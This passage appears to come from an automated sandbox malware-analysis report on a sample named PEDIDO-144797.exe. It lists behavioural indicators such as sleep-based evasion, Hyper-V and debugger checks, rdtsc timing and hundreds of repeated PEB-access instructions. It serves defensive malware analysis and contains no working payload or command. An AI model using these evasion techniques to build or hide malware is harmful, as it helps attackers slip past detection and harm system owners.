        Source: C:\Windows\SysWOW64\SecEdit.exe	API coverage: 1.1 %
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708	Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708	Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708	Thread sleep count: 9852 > 30
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 1708	Thread sleep time: -19704000s >= -30000s
        Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed
        Source: C:\Windows\SysWOW64\SecEdit.exe	Last function: Thread delayed
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_004066F3 FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_00402862 FindFirstFileW
        Source: PEDIDO-144797.exe, 00000002.00000002.90087025305.0000000002412000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
        Source: PEDIDO-144797.exe, 00000002.00000002.90087203673.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.89957706436.0000000002440000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144797.exe, 00000002.00000003.90002219442.0000000002440000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94452035443.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91567643029.000000000D86B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94452918228.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565997400.000000000D4A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.91565423827.000000000D2BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.92004260790.000000000D86B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.94454931688.000000000D866000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
        Source: SecEdit.exe, 00000004.00000002.91632535428.000000000283D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API call chain: ExitProcess graph end node graph_0-4671
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	API call chain: ExitProcess graph end node graph_0-4513
        Source: C:\Windows\SysWOW64\SecEdit.exe	Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\SecEdit.exe	Process queried: DebugPort
        Source: C:\Windows\SysWOW64\SecEdit.exe	Process queried: DebugPort
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326E1763 rdtsc
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326E34E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3275D270 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3273327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326CF24A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3275F247 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3276124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326DA22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_32720227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326C0230 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3272B214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3272B214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269A200 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269821B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_3269D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326972E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exe	Code function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA2E0 mov eax, dword ptr fs:[00000030h]2_2_326AA2E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A82E0 mov eax, dword ptr fs:[00000030h]2_2_326A82E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B02F9 mov eax, dword ptr fs:[00000030h]2_2_326B02F9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C32C5 mov eax, dword ptr fs:[00000030h]2_2_326C32C5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327732C9 mov eax, dword ptr fs:[00000030h]2_2_327732C9
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C42AF mov eax, dword ptr fs:[00000030h]2_2_326C42AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C42AF mov eax, dword ptr fs:[00000030h]2_2_326C42AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326992AF mov eax, dword ptr fs:[00000030h]2_2_326992AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277B2BC mov eax, dword ptr fs:[00000030h]2_2_3277B2BC
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3269C2B0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F2AE mov eax, dword ptr fs:[00000030h]2_2_3275F2AE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327692AB mov eax, dword ptr fs:[00000030h]2_2_327692AB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E289 mov eax, dword ptr fs:[00000030h]2_2_3271E289
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7290 mov eax, dword ptr fs:[00000030h]2_2_326A7290
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271E372 mov eax, dword ptr fs:[00000030h]2_2_3271E372
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720371 mov eax, dword ptr fs:[00000030h]2_2_32720371
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32720371 mov eax, dword ptr fs:[00000030h]2_2_32720371
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AB360 mov eax, dword ptr fs:[00000030h]2_2_326AB360
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE363 mov eax, dword ptr fs:[00000030h]2_2_326DE363
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C237A mov eax, dword ptr fs:[00000030h]2_2_326C237A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32698347 mov eax, dword ptr fs:[00000030h]2_2_32698347
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DA350 mov eax, dword ptr fs:[00000030h]2_2_326DA350
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E328 mov eax, dword ptr fs:[00000030h]2_2_3269E328
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C332D mov eax, dword ptr fs:[00000030h]2_2_326C332D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773336 mov eax, dword ptr fs:[00000030h]2_2_32773336
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D8322 mov eax, dword ptr fs:[00000030h]2_2_326D8322
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32699303 mov eax, dword ptr fs:[00000030h]2_2_32699303
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32699303 mov eax, dword ptr fs:[00000030h]2_2_32699303
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D631F mov eax, dword ptr fs:[00000030h]2_2_326D631F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BE310 mov eax, dword ptr fs:[00000030h]2_2_326BE310
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272330C mov eax, dword ptr fs:[00000030h]2_2_3272330C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F30A mov eax, dword ptr fs:[00000030h]2_2_3275F30A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A63CB mov eax, dword ptr fs:[00000030h]2_2_326A63CB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327243D5 mov eax, dword ptr fs:[00000030h]2_2_327243D5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269E3C0 mov eax, dword ptr fs:[00000030h]2_2_3269E3C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C3C7 mov eax, dword ptr fs:[00000030h]2_2_3269C3C7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D33D0 mov eax, dword ptr fs:[00000030h]2_2_326D33D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D43D0 mov ecx, dword ptr fs:[00000030h]2_2_326D43D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271C3B0 mov eax, dword ptr fs:[00000030h]2_2_3271C3B0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A93A6 mov eax, dword ptr fs:[00000030h]2_2_326A93A6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A93A6 mov eax, dword ptr fs:[00000030h]2_2_326A93A6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1380 mov eax, dword ptr fs:[00000030h]2_2_326A1380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF380 mov eax, dword ptr fs:[00000030h]2_2_326BF380
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CA390 mov eax, dword ptr fs:[00000030h]2_2_326CA390
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F38A mov eax, dword ptr fs:[00000030h]2_2_3275F38A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32749060 mov eax, dword ptr fs:[00000030h]2_2_32749060
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7072 mov eax, dword ptr fs:[00000030h]2_2_326A7072
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6074 mov eax, dword ptr fs:[00000030h]2_2_326A6074
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6074 mov eax, dword ptr fs:[00000030h]2_2_326A6074
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0044 mov eax, dword ptr fs:[00000030h]2_2_326D0044
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3277505B mov eax, dword ptr fs:[00000030h]2_2_3277505B
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1051 mov eax, dword ptr fs:[00000030h]2_2_326A1051
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A1051 mov eax, dword ptr fs:[00000030h]2_2_326A1051
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D02D mov eax, dword ptr fs:[00000030h]2_2_3269D02D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A8009 mov eax, dword ptr fs:[00000030h]2_2_326A8009
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C5004 mov eax, dword ptr fs:[00000030h]2_2_326C5004
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C5004 mov ecx, dword ptr fs:[00000030h]2_2_326C5004
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2010 mov ecx, dword ptr fs:[00000030h]2_2_326E2010
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326990F8 mov eax, dword ptr fs:[00000030h]2_2_326990F8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD0F0 mov eax, dword ptr fs:[00000030h]2_2_326DD0F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DD0F0 mov ecx, dword ptr fs:[00000030h]2_2_326DD0F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C0F6 mov eax, dword ptr fs:[00000030h]2_2_3269C0F6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BB0D0 mov eax, dword ptr fs:[00000030h]2_2_326BB0D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269B0D6 mov eax, dword ptr fs:[00000030h]2_2_3269B0D6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327750B7 mov eax, dword ptr fs:[00000030h]2_2_327750B7
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E00A5 mov eax, dword ptr fs:[00000030h]2_2_326E00A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275B0AF mov eax, dword ptr fs:[00000030h]2_2_3275B0AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C090 mov eax, dword ptr fs:[00000030h]2_2_3269C090
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A093 mov ecx, dword ptr fs:[00000030h]2_2_3269A093
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D716D mov eax, dword ptr fs:[00000030h]2_2_326D716D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6179 mov eax, dword ptr fs:[00000030h]2_2_326A6179
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F717A mov eax, dword ptr fs:[00000030h]2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F717A mov eax, dword ptr fs:[00000030h]2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
